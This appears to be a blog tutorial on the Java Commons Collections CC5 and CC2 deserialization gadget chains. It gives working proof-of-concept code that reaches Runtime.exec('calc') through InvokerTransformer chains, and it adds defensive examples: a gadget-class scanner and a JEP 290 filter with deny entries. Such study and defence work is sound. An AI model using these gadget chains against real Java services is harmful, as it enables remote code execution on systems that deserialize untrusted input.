Java CC chain 5 and CC chain 2

Published: 2024-01-18

Java CC chain 5

BadAttributeValueExpException.readObject()
    TiedMapEntry.toString()
        TiedMapEntry.getValue()
            LazyMap.get()
                ChainedTransformer.transform()
                    ConstantTransformer.transform()
                    InvokerTransformer.transform()
                        Method.invoke()
                            Class.getMethod()
                    InvokerTransformer.transform()
                        Method.invoke()
                            Runtime.getRuntime()
                    InvokerTransformer.transform()
                        Method.invoke()
                            Runtime.exec()

Looking at the call chain, the only difference from CC1 is the method through which the transformer chain is reached: here it is LazyMap.get(), which runs the decorating transformer whenever a key is missing from the underlying map.

import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

// Same transformer chain as CC1: Runtime.class -> getMethod("getRuntime") -> invoke -> exec("calc")
Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, null}),
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new String[]{"calc"}),
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> map = new HashMap<>();
// LazyMap.decorate() wraps the map; get() on an absent key passes that key to the transformer chain
Map<Object, Object> lazymap = LazyMap.decorate(map, chainedTransformer);
lazymap.get("test"); // fires the chain locally (no deserialization yet)

The shared part is copied over as is. What remains is to get TiedMapEntry.toString() called, and BadAttributeValueExpException.readObject() does exactly that on its val field:

// excerpt from BadAttributeValueExpException.readObject() in the JDK
Object valObj = gf.get("val", null);
val = valObj.toString();

So it is enough to set val via reflection to the TiedMapEntry. The final PoC is:

import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
import javax.management.BadAttributeValueExpException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, null}),
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new String[]{"calc"}),
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> map = new HashMap<>();
Map<Object, Object> lazymap = LazyMap.decorate(map, chainedTransformer);
// TiedMapEntry.toString() -> getValue() -> lazymap.get("aaa") -> transformer chain
TiedMapEntry aaa = new TiedMapEntry(lazymap, "aaa");
// val is passed through toString() in the constructor, so it is set afterwards via reflection
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
val.setAccessible(true);
val.set(badAttributeValueExpException, aaa);

// serialize()/unserialize() are the author's helper methods (not shown in the post);
// they write the object to person.bin and read it back with ObjectInputStream.readObject()
serialize(badAttributeValueExpException);
unserialize("person.bin");
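From the defender's side, the class names in the chain above are the signature: a stream that carries javax.management.BadAttributeValueExpException next to TiedMapEntry and LazyMap has no business arriving at a normal endpoint. The following scanner, an added example that is not part of the original post, pulls candidate class names out of a raw Java serialization stream without deserializing it (each TC_CLASSDESC tag 0x72 is followed by a length-prefixed class name) and matches them against the CC5 and CC2 gadget classes. Both sample inputs are constructed in main(): one is a real stream for the CC5 carrier with a harmless String value, the other is a hand-built class descriptor, so the demo runs without commons-collections on the classpath. The byte walk is a heuristic, not a full parser of the stream grammar, which is what makes it cheap enough for a gateway, proxy or log pipeline.

```java
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;
import javax.management.BadAttributeValueExpException;

// Added example: detect CC5/CC2 gadget class names in a serialized stream without deserializing it.
public class GadgetClassScanner {

    // Class names that appear in the CC5 (commons-collections 3.x) and CC2 (4.x) streams.
    static final Set<String> KNOWN_GADGET_CLASSES = Set.of(
            "javax.management.BadAttributeValueExpException",
            "org.apache.commons.collections.keyvalue.TiedMapEntry",
            "org.apache.commons.collections.map.LazyMap",
            "org.apache.commons.collections.functors.ChainedTransformer",
            "org.apache.commons.collections.functors.ConstantTransformer",
            "org.apache.commons.collections.functors.InvokerTransformer",
            "org.apache.commons.collections4.comparators.TransformingComparator",
            "org.apache.commons.collections4.functors.ChainedTransformer",
            "org.apache.commons.collections4.functors.ConstantTransformer",
            "org.apache.commons.collections4.functors.InvokerTransformer");

    // TC_CLASSDESC (0x72) is followed by a modified-UTF-8 class name: 2-byte big-endian
    // length, then the bytes. 0x72 is also ASCII 'r', so every candidate is validated
    // against the shape of a qualified Java class name to drop false positives.
    static List<String> classNames(byte[] stream) {
        List<String> names = new ArrayList<>();
        for (int i = 0; i + 3 <= stream.length; i++) {
            if (stream[i] != 0x72) continue;
            int len = ((stream[i + 1] & 0xff) << 8) | (stream[i + 2] & 0xff);
            if (len == 0 || len > 255 || i + 3 + len > stream.length) continue;
            String name = new String(stream, i + 3, len, StandardCharsets.UTF_8);
            if (name.matches("[A-Za-z_$][A-Za-z0-9_$]*(\\.[A-Za-z_$][A-Za-z0-9_$]*)+")) {
                names.add(name);
            }
        }
        return names;
    }

    // Returns the known gadget classes present in the stream, in stream order.
    static List<String> findGadgets(byte[] stream) {
        List<String> hits = new ArrayList<>();
        for (String n : classNames(stream)) {
            if (KNOWN_GADGET_CLASSES.contains(n)) hits.add(n);
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample 1: a genuine stream for the CC5 carrier class with a harmless value.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new BadAttributeValueExpException("harmless"));
        }
        System.out.println("sample 1 gadget classes: " + findGadgets(bos.toByteArray()));

        // Constructed sample 2: hand-built header and class descriptor naming a CC 3.x gadget,
        // so the check is exercised without commons-collections on the classpath.
        ByteArrayOutputStream fake = new ByteArrayOutputStream();
        DataOutputStream dos = new DataOutputStream(fake);
        dos.writeShort(0xaced);   // STREAM_MAGIC
        dos.writeShort(5);        // STREAM_VERSION
        dos.writeByte(0x73);      // TC_OBJECT
        dos.writeByte(0x72);      // TC_CLASSDESC
        dos.writeUTF("org.apache.commons.collections.map.LazyMap");
        dos.writeLong(0L);        // serialVersionUID (placeholder value)
        dos.flush();
        System.out.println("sample 2 gadget classes: " + findGadgets(fake.toByteArray()));
    }
}
```

Sample 1 reports the BadAttributeValueExpException descriptor (the JDK superclasses java.lang.Exception and java.lang.Throwable are also extracted but are not in the gadget set); sample 2 reports LazyMap. A hit on any of these names in a stream from an untrusted source is worth alerting on even when deserialization itself was blocked.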

Java CC chain 2

The CC2 call chain is similar to CC4; only the way the command is executed differs. CC4 loads bytecode, while the CC2 variant here goes through the reflective InvokerTransformer chain. The PoC is:

import java.lang.reflect.Field;
import java.util.PriorityQueue;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, null}),
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new String[]{"calc"}),
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// TransformingComparator.compare() runs the transformer on both arguments before comparing
TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer);
PriorityQueue test = new PriorityQueue<>(transformingComparator);
// Adding two elements would call compare() and fire the chain during construction,
// so the author leaves add() commented out and forces size to 2 via reflection instead:
// PriorityQueue.readObject() then calls heapify(), which compares the two (null) slots,
// and ConstantTransformer ignores its input, so null is fine.
//        test.add(1);
//        test.add(2);
Class aClass = test.getClass();
Field size = aClass.getDeclaredField("size");
size.setAccessible(true);
size.set(test, 2);

// serialize(test) is commented out in the original; uncomment it to regenerate person.bin
//        serialize(test);
unserialize("person.bin");
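Both chains, CC5 through BadAttributeValueExpException.readObject() and CC2 through PriorityQueue.readObject(), are stopped the same way: refuse the carrier and gadget classes before ObjectInputStream instantiates anything. The example below is added here and is not code from the original post; it uses the JDK's JEP 290 deserialization filter (java.io.ObjectInputFilter, Java 9+; Java 8u121+ has the same API under sun.misc.ObjectInputFilter). The allowlist is an assumption for an application that only ever deserializes a few java.lang and java.util value types; the explicit deny entries are redundant with the closing !* but document the known entry points and make rejections self-explanatory in logs. The harmless carrier objects in main() are constructed stand-ins, so the demo runs without commons-collections on the classpath.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.List;
import java.util.PriorityQueue;
import javax.management.BadAttributeValueExpException;

// Added example: a JEP 290 filter that blocks the CC5 and CC2 carrier and gadget classes.
public class GadgetChainFilterDemo {

    // Assumed allowlist for this application. Patterns are evaluated left to right,
    // first match wins, "!" rejects, "**" also matches subpackages.
    static final ObjectInputFilter ALLOWLIST = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxrefs=256;"
            + "!javax.management.BadAttributeValueExpException;"   // CC5 entry point
            + "!java.util.PriorityQueue;"                         // CC2 entry point
            + "!org.apache.commons.collections.**;"               // CC 3.x gadgets (LazyMap, TiedMapEntry, ...)
            + "!org.apache.commons.collections4.**;"              // CC 4.x gadgets (TransformingComparator, ...)
            + "java.lang.*;java.util.ArrayList;java.util.HashMap;"
            + "!*");                                              // everything else is rejected

    // Wrap the allowlist so every rejection is logged with the offending class:
    // a rejected gadget class is an attack attempt, not an application bug.
    static final ObjectInputFilter LOGGING_FILTER = info -> {
        ObjectInputFilter.Status status = ALLOWLIST.checkInput(info);
        if (status == ObjectInputFilter.Status.REJECTED) {
            System.err.println("deserialization rejected: class=" + info.serialClass()
                    + " depth=" + info.depth() + " refs=" + info.references());
        }
        return status;
    };

    static byte[] toBytes(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Returns the object graph if the filter accepts every class in it;
    // throws InvalidClassException ("filter status: REJECTED") otherwise.
    static Object deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(LOGGING_FILTER);   // must be set before readObject()
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Benign payload on the allowlist: accepted.
        List<String> ok = new ArrayList<>();
        ok.add("hello");
        System.out.println("accepted: " + deserializeFiltered(toBytes(ok)));

        // Constructed stand-ins for the two chain entry points. They carry harmless values,
        // but the filter rejects the carrier class itself, so neither readObject()'s
        // toString() call (CC5) nor heapify()'s compare() call (CC2) is ever reached.
        Object[] carriers = {
                new BadAttributeValueExpException("harmless"),   // CC5 carrier
                new PriorityQueue<>(List.of(1, 2)),               // CC2 carrier
        };
        for (Object carrier : carriers) {
            try {
                deserializeFiltered(toBytes(carrier));
                System.out.println("unexpected: accepted " + carrier.getClass().getName());
            } catch (InvalidClassException e) {
                System.out.println("blocked " + carrier.getClass().getName() + ": " + e.getMessage());
            }
        }
    }
}
```

A per-stream filter as above is the minimum; for code paths you do not control, the same pattern string can be applied process-wide through the jdk.serialFilter system property or ObjectInputFilter.Config.setSerialFilter(), and an allowlist ending in !* is preferable to a denylist of known gadget packages, because new gadget chains keep appearing in libraries that are already on the classpath.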

Source: https://blog.csdn.net/qq_54030686/article/details/135660377